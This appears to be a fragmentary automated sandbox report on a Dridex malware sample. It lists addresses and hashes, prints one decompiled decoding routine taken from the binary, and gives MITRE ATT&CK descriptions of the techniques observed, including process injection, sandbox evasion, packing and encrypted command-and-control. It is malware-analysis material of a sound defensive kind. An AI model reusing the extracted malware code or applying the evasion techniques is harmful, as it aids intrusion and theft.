0x0040bf50
0x0040bf54
0x0040bf58
0x0040bf61
0x0040bf66
0x0040bf6e
0x0040bf70
0x0040bf79
0x0040bf80
0x0040bf84
0x0040bf84
0x0040bf89
0x0040bf95
0x0040bf95
0x0040be85
0x0040be89
0x0040be92
0x0040be97
0x0040be9f
0x0040bea1
0x0040beaa
0x0040beb1
0x0040beb5
0x0040beb5
0x0040beba
0x0040bec6
0x0040bec6
0x0040be83
0x0040be43
0x0040bdea
0x0040bbd8
0x0040bbd8
0x0040bbe4
0x0040bbe4
0x0040bbae
0x0040bbae
0x0040bbba
0x0040bbba
0x0040bbac
0x0040bba3
0x00000000
0x00000000
0x00000000
0x0040bb76

Memory Dump Source

Source File: 00000001.00000002.592946882.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.592977672.0000000000418000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1b6ac78f48c8ac23d66b5682442f143f7c13e847981c549b6c19fbe490dfd2a
Instruction ID: d1440420a180975574e9ab902ee0bb4ceb1a01d3df5df17f20b76a6aeee57a4f
Opcode Fuzzy Hash: e1b6ac78f48c8ac23d66b5682442f143f7c13e847981c549b6c19fbe490dfd2a
Instruction Fuzzy Hash: 60523F716083409FD360EB76D881B9FB7E0AF84314F10493FF599A62D2DB789945CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC50, Relevance: .1, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040AC50(intOrPtr* __ecx) {
				intOrPtr _t39;
				signed int _t43;
				intOrPtr* _t44;
				signed int _t45;
				unsigned int _t46;
				void* _t51;
				intOrPtr _t52;
				void* _t56;
				char* _t58;
				void* _t60;
				char* _t61;
				intOrPtr _t62;
				signed int _t71;
				intOrPtr _t72;
				signed int _t73;
				signed int _t79;
				char* _t80;
				intOrPtr _t81;
				void* _t82;
				unsigned int _t87;
				char* _t89;
				char* _t90;
				void* _t91;

				_t44 = __ecx;
				_t89 =  *((intOrPtr*)(_t91 + 0x38));
				E00401990();
				if(_t89 == 0 ||  *_t89 == 0) {
					return _t44;
				} else {
					_t61 = _t89;
					_t71 = 0;
					_t80 = _t61;
					do {
						_t61 = _t61 + 1;
						_t71 = _t71 + 1;
					} while ( *_t61 != 0);
					E00409F60(__ecx, _t71);
					_t51 = 0;
					if( *_t89 != 0) {
						do {
							_t80 = _t80 + 1;
							_t51 = _t51 + 1;
						} while ( *_t80 != 0);
					}
					_t52 = _t51 + _t89;
					_t62 = 0;
					_t72 =  *_t44;
					_t81 =  *((intOrPtr*)(_t44 + 8));
					if(_t89 < _t52) {
						 *((intOrPtr*)(_t91 + 0x20)) = _t52;
						_t39 = 0;
						 *((intOrPtr*)(_t91 + 8)) = _t81;
						 *((intOrPtr*)(_t91 + 0x14)) = _t72;
						 *((intOrPtr*)(_t91 + 4)) = _t44;
						do {
							_t45 = 0;
							_t73 = 0;
							 *((intOrPtr*)(_t91 + 0x18)) = _t39;
							_t82 = 0;
							 *((intOrPtr*)(_t91 + 0x1c)) = _t62;
							while(_t89 <  *((intOrPtr*)(_t91 + 0x20))) {
								_t43 = E0040ADE4( *_t89);
								_t10 = _t82 - 1; // -1
								_t88 =  ==  ? _t10 : _t82;
								_t82 = ( ==  ? _t10 : _t82) + 1;
								_t45 =  !=  ? _t45 << 0x00000006 | _t43 : _t45;
								_t11 = _t73 + 6; // 0x6
								_t73 =  !=  ? _t11 : _t73;
								_t89 = _t89 + 1;
								if(_t82 < 4) {
									continue;
								}
								break;
							}
							_t39 =  *((intOrPtr*)(_t91 + 0x18));
							_t62 =  *((intOrPtr*)(_t91 + 0x1c));
							_t87 = (_t73 >> 2 >> 0x1d) + _t73 >> 3;
							if(_t39 == 0) {
								 *(_t91 + 0xc) = _t45;
								_t45 =  *(_t91 + 0xc);
								_t39 =  >  ? 1 : _t39;
							}
							_t46 = _t45 <<  ~_t73 + 0x18;
							if(_t87 > 0) {
								_t62 = _t62 + _t87;
								if(_t39 == 0) {
									_t79 = (_t87 >> 0x1f) + _t87 >> 1;
									if(_t79 <= 0) {
										_t56 = 1;
									} else {
										 *((intOrPtr*)(_t91 + 0x10)) = _t89;
										_t60 = 0;
										 *((intOrPtr*)(_t91 + 0x18)) = _t39;
										 *((intOrPtr*)(_t91 + 0x1c)) = _t62;
										_t90 =  *((intOrPtr*)(_t91 + 0x14));
										do {
											_t60 = _t60 + 1;
											 *_t90 = _t46 >> 0x10;
											 *((char*)(_t90 + 1)) = (_t46 & 0x00ffff00) >> 8;
											_t90 = _t90 + 2;
											_t46 = _t46 << 0x10;
										} while (_t60 < _t79);
										 *((intOrPtr*)(_t91 + 0x14)) = _t90;
										_t56 = _t60 + _t60 + 1;
										_t39 =  *((intOrPtr*)(_t91 + 0x18));
										_t62 =  *((intOrPtr*)(_t91 + 0x1c));
										_t89 =  *((intOrPtr*)(_t91 + 0x10));
									}
									if(_t87 > _t56 - 1) {
										_t58 =  *((intOrPtr*)(_t91 + 0x14));
										 *_t58 = _t46 >> 0x10;
										 *((intOrPtr*)(_t91 + 0x14)) = _t58 + 1;
									}
								}
							}
						} while (_t89 <  *((intOrPtr*)(_t91 + 0x20)));
						_t44 =  *((intOrPtr*)(_t91 + 4));
					}
					E00409F60(_t44, _t62);
					return _t44;
				}
			}

0x0040ac57
0x0040ac59
0x0040ac5d
0x0040ac64
0x0040ac75
0x0040ac78
0x0040ac78
0x0040ac7a
0x0040ac7c
0x0040ac7e
0x0040ac7e
0x0040ac7f
0x0040ac80
0x0040ac88
0x0040ac8d
0x0040ac93
0x0040ac95
0x0040ac95
0x0040ac96
0x0040ac97
0x0040ac95
0x0040ac9c
0x0040ac9e
0x0040aca0
0x0040aca4
0x0040aca7
0x0040acad
0x0040acb1
0x0040acb3
0x0040acb7
0x0040acbb
0x0040acbf
0x0040acbf
0x0040acc1
0x0040acc3
0x0040acc7
0x0040acc9
0x0040accd
0x0040acd7
0x0040acdf
0x0040ace2
0x0040acea
0x0040acf0
0x0040acf3
0x0040acf6
0x0040acf9
0x0040acfd
0x00000000
0x00000000
0x00000000
0x0040acfd
0x0040acff
0x0040ad03
0x0040ad11
0x0040ad16
0x0040ad18
0x0040ad28
0x0040ad2c
0x0040ad2c
0x0040ad36
0x0040ad3a
0x0040ad3e
0x0040ad41
0x0040ad4a
0x0040ad4e
0x0040adcc
0x0040ad50
0x0040ad50
0x0040ad54
0x0040ad56
0x0040ad5a
0x0040ad5e
0x0040ad62
0x0040ad6c
0x0040ad73
0x0040ad76
0x0040ad79
0x0040ad7c
0x0040ad7f
0x0040ad83
0x0040ad87
0x0040ad8b
0x0040ad8f
0x0040ad93
0x0040ad93
0x0040ad9a
0x0040ad9c
0x0040ada3
0x0040ada6
0x0040ada6
0x0040ad9a
0x0040ad41
0x0040adaa
0x0040adb4
0x0040adb4
0x0040adbb
0x0040adc9
0x0040adc9

Memory Dump Source

Source File: 00000001.00000002.592946882.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.592977672.0000000000418000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4113574f4ba36a50daa565143a4a908347b1621901a6703a37eec8d59b2e8513
Instruction ID: 77cfc4a41ca4d12f4a95c08d8bfb30acf8e0fbc0da1748c467e1b1d680be855c
Opcode Fuzzy Hash: 4113574f4ba36a50daa565143a4a908347b1621901a6703a37eec8d59b2e8513
Instruction Fuzzy Hash: E1410172A083558FD714CE29888016FF7D2EFD5310F058A3EE899AB381D638DD5AC796

Uniqueness

Uniqueness Score: -1.00%

Function 00413F88, Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.592946882.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.592977672.0000000000418000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f06e87e9fbd4951d690df65b20260cfb70d11d1d8ae34566e4e04ed26c408d30
Instruction ID: 4040641850cb8629d64f83f392e5cf01d424c70db25eb4935c55a16a010ab148
Opcode Fuzzy Hash: f06e87e9fbd4951d690df65b20260cfb70d11d1d8ae34566e4e04ed26c408d30
Instruction Fuzzy Hash: 3D517472669EC1978341EF6DC5C4EC47BB0F3EAB6239C0958E06183352D75AE905CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00412888, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.592946882.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.592977672.0000000000418000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6e0655a7a14a8b2f49f19991a92f7c51b4a4b023e9a9046ae205a97c008c69b
Instruction ID: d4cb2fa82a4468d1c12cbd1453d1f29fe623fc00a9952bca79de7d4b856f1ff0
Opcode Fuzzy Hash: e6e0655a7a14a8b2f49f19991a92f7c51b4a4b023e9a9046ae205a97c008c69b
Instruction Fuzzy Hash: F0310F1332AECD46C34ADB34C1515C23FE9E5965313C8CEB8D0BB422ABC686A50FD788

Uniqueness

Uniqueness Score: -1.00%

Function 0041434E, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.592946882.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.592977672.0000000000418000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e81ec70b5eb304031a5b0a02687049b52f29027f59d9b37b3e431511f9576bc4
Instruction ID: dcc22f0b0dbd34b6afb875651b6cc3c5dae16f6707c9e6fa1e49f82bbc378d62
Opcode Fuzzy Hash: e81ec70b5eb304031a5b0a02687049b52f29027f59d9b37b3e431511f9576bc4
Instruction Fuzzy Hash: 57311C7222EAC547C346DB3DC5C46487FB1E7DAB2138C8B9DD0A283782C759A60AC794

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Dridex

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: Dridex.exe PID: 6616 Parent PID: 5872

General

Chronological Activities

Analysis Process: Dridex.exe PID: 6660 Parent PID: 6616

Function 00402410, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111
COMMON

Function 00401EA0, Relevance: 27.1, APIs: 18, Instructions: 99
COMMON

Function 00402020, Relevance: 22.6, APIs: 15, Instructions: 66
COMMON

Function 00404E70, Relevance: 3.2, APIs: 2, Instructions: 243
registryCOMMON

Function 0040A040, Relevance: 3.2, APIs: 2, Instructions: 205
networkCOMMON

Function 00402080, Relevance: 3.2, APIs: 2, Instructions: 191
COMMON

Function 00402594, Relevance: 3.2, APIs: 2, Instructions: 159
COMMON

Function 00402400, Relevance: 3.1, APIs: 2, Instructions: 68
registryCOMMON

Function 00401FC4, Relevance: 3.0, APIs: 2, Instructions: 25
memoryCOMMON

Function 004097F0, Relevance: 2.0, APIs: 1, Instructions: 493
networkCOMMON

Function 0040A980, Relevance: 1.6, APIs: 1, Instructions: 63
networkCOMMON

Function 0040E914, Relevance: 1.6, APIs: 1, Instructions: 52
libraryCOMMON

Function 00408E20, Relevance: 1.5, APIs: 1, Instructions: 42
registryCOMMON

Function 0040BAB4, Relevance: 1.5, APIs: 1, Instructions: 28
memoryCOMMON

Function 00408190, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Function 00401FD0, Relevance: 1.5, APIs: 1, Instructions: 15
memoryCOMMON

Function 0040BA8C, Relevance: 1.5, APIs: 1, Instructions: 10
registryCOMMON

Function 0040AF54, Relevance: 1.5, APIs: 1, Instructions: 10
networkCOMMON

Function 00402024, Relevance: 1.3, APIs: 1, Instructions: 11
sleepCOMMON

Function 00407B1D, Relevance: 1.7, Strings: 1, Instructions: 421
COMMONCrypto

Function 0040BB48, Relevance: .8, Instructions: 777
COMMONCrypto

Function 0040AC50, Relevance: .1, Instructions: 145
COMMONCrypto